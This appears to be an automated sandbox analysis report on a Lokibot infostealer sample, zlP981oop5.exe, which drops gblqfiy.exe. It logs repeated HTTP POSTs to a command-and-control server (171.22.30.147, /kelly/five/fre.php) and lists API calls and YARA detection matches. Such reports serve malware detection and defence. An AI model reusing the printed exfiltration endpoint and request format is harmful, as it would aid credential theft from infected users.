            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 163Connection: close
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
            Source: zlP981oop5.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: gblqfiy.exe, gblqfiy.exe, 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, gblqfiy.exe, 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: unknownHTTP traffic detected: POST /kelly/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA36E926Content-Length: 190Connection: close
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 3_2_00404ED4 recv,
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

            System Summary

            barindex
            Source: 1.2.gblqfiy.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 1.2.gblqfiy.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 1.2.gblqfiy.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 1.2.gblqfiy.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: gblqfiy.exe PID: 5172, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: gblqfiy.exe PID: 5316, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: zlP981oop5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 1.2.gblqfiy.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 1.2.gblqfiy.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 1.2.gblqfiy.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 1.2.gblqfiy.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
